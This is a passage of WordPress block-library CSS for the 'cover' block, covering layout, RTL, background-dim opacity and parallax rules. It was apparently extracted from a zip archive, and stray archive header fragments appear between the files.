h5:where(:not(.has-text-color)),.wp-block-cover-image h6:where(:not(.has-text-color)),.wp-block-cover-image p:where(:not(.has-text-color)){color:inherit}.wp-block-cover-image.is-position-top-left,.wp-block-cover.is-position-top-left{align-items:flex-start;justify-content:flex-start}.wp-block-cover-image.is-position-top-center,.wp-block-cover.is-position-top-center{align-items:flex-start;justify-content:center}.wp-block-cover-image.is-position-top-right,.wp-block-cover.is-position-top-right{align-items:flex-start;justify-content:flex-end}.wp-block-cover-image.is-position-center-left,.wp-block-cover.is-position-center-left{align-items:center;justify-content:flex-start}.wp-block-cover-image.is-position-center-center,.wp-block-cover.is-position-center-center{align-items:center;justify-content:center}.wp-block-cover-image.is-position-center-right,.wp-block-cover.is-position-center-right{align-items:center;justify-content:flex-end}.wp-block-cover-image.is-position-bottom-left,.wp-block-cover.is-position-bottom-left{align-items:flex-end;justify-content:flex-start}.wp-block-cover-image.is-position-bottom-center,.wp-block-cover.is-position-bottom-center{align-items:flex-end;justify-content:center}.wp-block-cover-image.is-position-bottom-right,.wp-block-cover.is-position-bottom-right{align-items:flex-end;justify-content:flex-end}.wp-block-cover-image.has-custom-content-position.has-custom-content-position .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position .wp-block-cover__inner-container{margin:0}.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-bottom-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-bottom-right .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-center-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-center-right .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-top-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-top-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-bottom-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-bottom-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-center-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-center-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-top-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-top-right .wp-block-cover__inner-container{margin:0;width:auto}.wp-block-cover .wp-block-cover__image-background,.wp-block-cover video.wp-block-cover__video-background,.wp-block-cover-image .wp-block-cover__image-background,.wp-block-cover-image video.wp-block-cover__video-background{border:none;bottom:0;box-shadow:none;height:100%;left:0;margin:0;max-height:none;max-width:none;object-fit:cover;outline:none;padding:0;position:absolute;right:0;top:0;width:100%}.wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{background-attachment:fixed;background-repeat:no-repeat;background-size:cover}@supports (-webkit-touch-callout:inherit){.wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{background-attachment:scroll}}@media (prefers-reduced-motion:reduce){.wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{background-attachment:scroll}}.wp-block-cover-image.is-repeated,.wp-block-cover.is-repeated,.wp-block-cover__image-background.is-repeated,video.wp-block-cover__video-background.is-repeated{background-repeat:repeat;background-size:auto}.wp-block-cover__image-background,.wp-block-cover__video-background{z-index:0}.wp-block-cover-image-text,.wp-block-cover-image-text a,.wp-block-cover-image-text a:active,.wp-block-cover-image-text a:focus,.wp-block-cover-image-text a:hover,.wp-block-cover-text,.wp-block-cover-text a,.wp-block-cover-text a:active,.wp-block-cover-text a:focus,.wp-block-cover-text a:hover,section.wp-block-cover-image h2,section.wp-block-cover-image h2 a,section.wp-block-cover-image h2 a:active,section.wp-block-cover-image h2 a:focus,section.wp-block-cover-image h2 a:hover{color:#fff}.wp-block-cover-image .wp-block-cover.has-left-content{justify-content:flex-start}.wp-block-cover-image .wp-block-cover.has-right-content{justify-content:flex-end}.wp-block-cover-image.has-left-content .wp-block-cover-image-text,.wp-block-cover.has-left-content .wp-block-cover-text,section.wp-block-cover-image.has-left-content>h2{margin-left:0;text-align:left}.wp-block-cover-image.has-right-content .wp-block-cover-image-text,.wp-block-cover.has-right-content .wp-block-cover-text,section.wp-block-cover-image.has-right-content>h2{margin-right:0;text-align:right}.wp-block-cover .wp-block-cover-text,.wp-block-cover-image .wp-block-cover-image-text,section.wp-block-cover-image>h2{font-size:2em;line-height:1.25;margin-bottom:0;max-width:840px;padding:.44em;text-align:center;z-index:1}:where(.wp-block-cover-image:not(.has-text-color)),:where(.wp-block-cover:not(.has-text-color)){color:#fff}:where(.wp-block-cover-image.is-light:not(.has-text-color)),:where(.wp-block-cover.is-light:not(.has-text-color)){color:#000}PK7[cover/editor-rtl.cssnu[.editor-styles-wrapper .wp-block-cover{ box-sizing:border-box; } .wp-block-cover.is-placeholder{ align-items:stretch; display:flex; min-height:240px; padding:0 !important; } .wp-block-cover.is-placeholder .components-placeholder.is-large{ justify-content:flex-start; z-index:1; } .wp-block-cover.is-placeholder:focus:after{ min-height:auto; } .wp-block-cover.components-placeholder h2{ color:inherit; } .wp-block-cover.is-transient:before{ background-color:#fff; opacity:.3; } .wp-block-cover .components-spinner{ margin:0; position:absolute; right:50%; top:50%; transform:translate(50%, -50%); z-index:1; } .wp-block-cover .wp-block-cover__inner-container{ margin-left:0; margin-right:0; text-align:right; } .wp-block-cover .wp-block-cover__placeholder-background-options{ width:100%; } .wp-block-cover .wp-block-cover__image--placeholder-image{ bottom:0; left:0; position:absolute; right:0; top:0; } [data-align=left]>.wp-block-cover,[data-align=right]>.wp-block-cover{ max-width:420px; width:100%; } .block-library-cover__reset-button{ margin-right:auto; } .block-library-cover__resize-container{ bottom:0; left:0; min-height:50px; position:absolute !important; right:0; top:0; } .components-popover.block-editor-block-popover.block-library-cover__resizable-box-popover .block-library-cover__resize-container,.components-popover.block-editor-block-popover.block-library-cover__resizable-box-popover .components-popover__content>div{ overflow:visible; pointer-events:none; } .wp-block-cover>.components-drop-zone .components-drop-zone__content{ opacity:.8 !important; } .block-editor-block-patterns-list__list-item .has-parallax.wp-block-cover{ background-attachment:scroll; } .color-block-support-panel__inner-wrapper>:not(.block-editor-tools-panel-color-gradient-settings__item){ margin-top:24px; } .wp-block-cover:after{ min-height:auto; }PK7[Kcover/editor-rtl.min.cssnu[.editor-styles-wrapper .wp-block-cover{box-sizing:border-box}.wp-block-cover.is-placeholder{align-items:stretch;display:flex;min-height:240px;padding:0!important}.wp-block-cover.is-placeholder .components-placeholder.is-large{justify-content:flex-start;z-index:1}.wp-block-cover.is-placeholder:focus:after{min-height:auto}.wp-block-cover.components-placeholder h2{color:inherit}.wp-block-cover.is-transient:before{background-color:#fff;opacity:.3}.wp-block-cover .components-spinner{margin:0;position:absolute;right:50%;top:50%;transform:translate(50%,-50%);z-index:1}.wp-block-cover .wp-block-cover__inner-container{margin-left:0;margin-right:0;text-align:right}.wp-block-cover .wp-block-cover__placeholder-background-options{width:100%}.wp-block-cover .wp-block-cover__image--placeholder-image{bottom:0;left:0;position:absolute;right:0;top:0}[data-align=left]>.wp-block-cover,[data-align=right]>.wp-block-cover{max-width:420px;width:100%}.block-library-cover__reset-button{margin-right:auto}.block-library-cover__resize-container{bottom:0;left:0;min-height:50px;position:absolute!important;right:0;top:0}.components-popover.block-editor-block-popover.block-library-cover__resizable-box-popover .block-library-cover__resize-container,.components-popover.block-editor-block-popover.block-library-cover__resizable-box-popover .components-popover__content>div{overflow:visible;pointer-events:none}.wp-block-cover>.components-drop-zone .components-drop-zone__content{opacity:.8!important}.block-editor-block-patterns-list__list-item .has-parallax.wp-block-cover{background-attachment:scroll}.color-block-support-panel__inner-wrapper>:not(.block-editor-tools-panel-color-gradient-settings__item){margin-top:24px}.wp-block-cover:after{min-height:auto}PK7[̋uJuJcover/style-rtl.cssnu[.wp-block-cover,.wp-block-cover-image{ align-items:center; background-position:50%; box-sizing:border-box; direction:ltr; display:flex; justify-content:center; min-height:430px; overflow:hidden; overflow:clip; padding:1em; position:relative; } .wp-block-cover .has-background-dim:not([class*=-background-color]),.wp-block-cover-image .has-background-dim:not([class*=-background-color]),.wp-block-cover-image.has-background-dim:not([class*=-background-color]),.wp-block-cover.has-background-dim:not([class*=-background-color]){ background-color:#000; } .wp-block-cover .has-background-dim.has-background-gradient,.wp-block-cover-image .has-background-dim.has-background-gradient{ background-color:transparent; } .wp-block-cover-image.has-background-dim:before,.wp-block-cover.has-background-dim:before{ background-color:inherit; content:""; } .wp-block-cover .wp-block-cover__background,.wp-block-cover .wp-block-cover__gradient-background,.wp-block-cover-image .wp-block-cover__background,.wp-block-cover-image .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim:not(.has-background-gradient):before,.wp-block-cover.has-background-dim:not(.has-background-gradient):before{ bottom:0; left:0; opacity:.5; position:absolute; right:0; top:0; z-index:1; } .wp-block-cover-image.has-background-dim.has-background-dim-10 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-10 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-10:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-10 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-10 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-10:not(.has-background-gradient):before{ opacity:.1; } .wp-block-cover-image.has-background-dim.has-background-dim-20 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-20 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-20:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-20 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-20 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-20:not(.has-background-gradient):before{ opacity:.2; } .wp-block-cover-image.has-background-dim.has-background-dim-30 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-30 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-30:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-30 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-30 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-30:not(.has-background-gradient):before{ opacity:.3; } .wp-block-cover-image.has-background-dim.has-background-dim-40 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-40 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-40:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-40 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-40 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-40:not(.has-background-gradient):before{ opacity:.4; } .wp-block-cover-image.has-background-dim.has-background-dim-50 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-50 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-50:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-50 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-50 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-50:not(.has-background-gradient):before{ opacity:.5; } .wp-block-cover-image.has-background-dim.has-background-dim-60 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-60 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-60:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-60 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-60 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-60:not(.has-background-gradient):before{ opacity:.6; } .wp-block-cover-image.has-background-dim.has-background-dim-70 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-70 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-70:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-70 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-70 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-70:not(.has-background-gradient):before{ opacity:.7; } .wp-block-cover-image.has-background-dim.has-background-dim-80 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-80 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-80:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-80 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-80 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-80:not(.has-background-gradient):before{ opacity:.8; } .wp-block-cover-image.has-background-dim.has-background-dim-90 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-90 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-90:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-90 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-90 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-90:not(.has-background-gradient):before{ opacity:.9; } .wp-block-cover-image.has-background-dim.has-background-dim-100 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-100 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-100:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-100 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-100 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-100:not(.has-background-gradient):before{ opacity:1; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-0,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-0,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-0,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-0{ opacity:0; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-10,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-10,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-10,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-10{ opacity:.1; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-20,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-20,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-20,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-20{ opacity:.2; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-30,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-30,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-30,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-30{ opacity:.3; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-40,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-40,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-40,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-40{ opacity:.4; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-50,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-50,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-50,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-50{ opacity:.5; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-60,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-60,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-60,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-60{ opacity:.6; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-70,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-70,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-70,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-70{ opacity:.7; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-80,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-80,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-80,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-80{ opacity:.8; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-90,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-90,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-90,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-90{ opacity:.9; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-100,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-100,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-100,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-100{ opacity:1; } .wp-block-cover-image.alignleft,.wp-block-cover-image.alignright,.wp-block-cover.alignleft,.wp-block-cover.alignright{ max-width:420px; width:100%; } .wp-block-cover-image:after,.wp-block-cover:after{ content:""; display:block; font-size:0; min-height:inherit; } @supports (position:sticky){ .wp-block-cover-image:after,.wp-block-cover:after{ content:none; } } .wp-block-cover-image.aligncenter,.wp-block-cover-image.alignleft,.wp-block-cover-image.alignright,.wp-block-cover.aligncenter,.wp-block-cover.alignleft,.wp-block-cover.alignright{ display:flex; } .wp-block-cover .wp-block-cover__inner-container,.wp-block-cover-image .wp-block-cover__inner-container{ color:inherit; direction:rtl; width:100%; z-index:1; } .wp-block-cover h1:where(:not(.has-text-color)),.wp-block-cover h2:where(:not(.has-text-color)),.wp-block-cover h3:where(:not(.has-text-color)),.wp-block-cover h4:where(:not(.has-text-color)),.wp-block-cover h5:where(:not(.has-text-color)),.wp-block-cover h6:where(:not(.has-text-color)),.wp-block-cover p:where(:not(.has-text-color)),.wp-block-cover-image h1:where(:not(.has-text-color)),.wp-block-cover-image h2:where(:not(.has-text-color)),.wp-block-cover-image h3:where(:not(.has-text-color)),.wp-block-cover-image h4:where(:not(.has-text-color)),.wp-block-cover-image h5:where(:not(.has-text-color)),.wp-block-cover-image h6:where(:not(.has-text-color)),.wp-block-cover-image p:where(:not(.has-text-color)){ color:inherit; } .wp-block-cover-image.is-position-top-left,.wp-block-cover.is-position-top-left{ align-items:flex-start; justify-content:flex-start; } .wp-block-cover-image.is-position-top-center,.wp-block-cover.is-position-top-center{ align-items:flex-start; justify-content:center; } .wp-block-cover-image.is-position-top-right,.wp-block-cover.is-position-top-right{ align-items:flex-start; justify-content:flex-end; } .wp-block-cover-image.is-position-center-left,.wp-block-cover.is-position-center-left{ align-items:center; justify-content:flex-start; } .wp-block-cover-image.is-position-center-center,.wp-block-cover.is-position-center-center{ align-items:center; justify-content:center; } .wp-block-cover-image.is-position-center-right,.wp-block-cover.is-position-center-right{ align-items:center; justify-content:flex-end; } .wp-block-cover-image.is-position-bottom-left,.wp-block-cover.is-position-bottom-left{ align-items:flex-end; justify-content:flex-start; } .wp-block-cover-image.is-position-bottom-center,.wp-block-cover.is-position-bottom-center{ align-items:flex-end; justify-content:center; } .wp-block-cover-image.is-position-bottom-right,.wp-block-cover.is-position-bottom-right{ align-items:flex-end; justify-content:flex-end; } .wp-block-cover-image.has-custom-content-position.has-custom-content-position .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position .wp-block-cover__inner-container{ margin:0; } .wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-bottom-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-bottom-right .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-center-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-center-right .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-top-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-top-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-bottom-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-bottom-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-center-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-center-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-top-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-top-right .wp-block-cover__inner-container{ margin:0; width:auto; } .wp-block-cover .wp-block-cover__image-background,.wp-block-cover video.wp-block-cover__video-background,.wp-block-cover-image .wp-block-cover__image-background,.wp-block-cover-image video.wp-block-cover__video-background{ border:none; bottom:0; box-shadow:none; height:100%; left:0; margin:0; max-height:none; max-width:none; object-fit:cover; outline:none; padding:0; position:absolute; right:0; top:0; width:100%; } .wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{ background-attachment:fixed; background-repeat:no-repeat; background-size:cover; } @supports (-webkit-touch-callout:inherit){ .wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{ background-attachment:scroll; } } @media (prefers-reduced-motion:reduce){ .wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{ background-attachment:scroll; } } .wp-block-cover-image.is-repeated,.wp-block-cover.is-repeated,.wp-block-cover__image-background.is-repeated,video.wp-block-cover__video-background.is-repeated{ background-repeat:repeat; background-size:auto; } .wp-block-cover__image-background,.wp-block-cover__video-background{ z-index:0; } .wp-block-cover-image-text,.wp-block-cover-image-text a,.wp-block-cover-image-text a:active,.wp-block-cover-image-text a:focus,.wp-block-cover-image-text a:hover,.wp-block-cover-text,.wp-block-cover-text a,.wp-block-cover-text a:active,.wp-block-cover-text a:focus,.wp-block-cover-text a:hover,section.wp-block-cover-image h2,section.wp-block-cover-image h2 a,section.wp-block-cover-image h2 a:active,section.wp-block-cover-image h2 a:focus,section.wp-block-cover-image h2 a:hover{ color:#fff; } .wp-block-cover-image .wp-block-cover.has-left-content{ justify-content:flex-start; } .wp-block-cover-image .wp-block-cover.has-right-content{ justify-content:flex-end; } .wp-block-cover-image.has-left-content .wp-block-cover-image-text,.wp-block-cover.has-left-content .wp-block-cover-text,section.wp-block-cover-image.has-left-content>h2{ margin-right:0; text-align:right; } .wp-block-cover-image.has-right-content .wp-block-cover-image-text,.wp-block-cover.has-right-content .wp-block-cover-text,section.wp-block-cover-image.has-right-content>h2{ margin-left:0; text-align:left; } .wp-block-cover .wp-block-cover-text,.wp-block-cover-image .wp-block-cover-image-text,section.wp-block-cover-image>h2{ font-size:2em; line-height:1.25; margin-bottom:0; max-width:840px; padding:.44em; text-align:center; z-index:1; } :where(.wp-block-cover-image:not(.has-text-color)),:where(.wp-block-cover:not(.has-text-color)){ color:#fff; } :where(.wp-block-cover-image.is-light:not(.has-text-color)),:where(.wp-block-cover.is-light:not(.has-text-color)){ color:#000; }PK7[Wa\WJWJcover/style.cssnu[.wp-block-cover,.wp-block-cover-image{ align-items:center; background-position:50%; box-sizing:border-box; display:flex; justify-content:center; min-height:430px; overflow:hidden; overflow:clip; padding:1em; position:relative; } .wp-block-cover .has-background-dim:not([class*=-background-color]),.wp-block-cover-image .has-background-dim:not([class*=-background-color]),.wp-block-cover-image.has-background-dim:not([class*=-background-color]),.wp-block-cover.has-background-dim:not([class*=-background-color]){ background-color:#000; } .wp-block-cover .has-background-dim.has-background-gradient,.wp-block-cover-image .has-background-dim.has-background-gradient{ background-color:transparent; } .wp-block-cover-image.has-background-dim:before,.wp-block-cover.has-background-dim:before{ background-color:inherit; content:""; } .wp-block-cover .wp-block-cover__background,.wp-block-cover .wp-block-cover__gradient-background,.wp-block-cover-image .wp-block-cover__background,.wp-block-cover-image .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim:not(.has-background-gradient):before,.wp-block-cover.has-background-dim:not(.has-background-gradient):before{ bottom:0; left:0; opacity:.5; position:absolute; right:0; top:0; z-index:1; } .wp-block-cover-image.has-background-dim.has-background-dim-10 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-10 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-10:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-10 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-10 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-10:not(.has-background-gradient):before{ opacity:.1; } .wp-block-cover-image.has-background-dim.has-background-dim-20 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-20 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-20:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-20 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-20 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-20:not(.has-background-gradient):before{ opacity:.2; } .wp-block-cover-image.has-background-dim.has-background-dim-30 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-30 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-30:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-30 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-30 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-30:not(.has-background-gradient):before{ opacity:.3; } .wp-block-cover-image.has-background-dim.has-background-dim-40 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-40 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-40:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-40 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-40 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-40:not(.has-background-gradient):before{ opacity:.4; } .wp-block-cover-image.has-background-dim.has-background-dim-50 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-50 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-50:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-50 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-50 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-50:not(.has-background-gradient):before{ opacity:.5; } .wp-block-cover-image.has-background-dim.has-background-dim-60 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-60 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-60:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-60 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-60 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-60:not(.has-background-gradient):before{ opacity:.6; } .wp-block-cover-image.has-background-dim.has-background-dim-70 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-70 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-70:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-70 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-70 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-70:not(.has-background-gradient):before{ opacity:.7; } .wp-block-cover-image.has-background-dim.has-background-dim-80 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-80 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-80:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-80 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-80 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-80:not(.has-background-gradient):before{ opacity:.8; } .wp-block-cover-image.has-background-dim.has-background-dim-90 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-90 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-90:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-90 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-90 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-90:not(.has-background-gradient):before{ opacity:.9; } .wp-block-cover-image.has-background-dim.has-background-dim-100 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-100 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-100:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-100 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-100 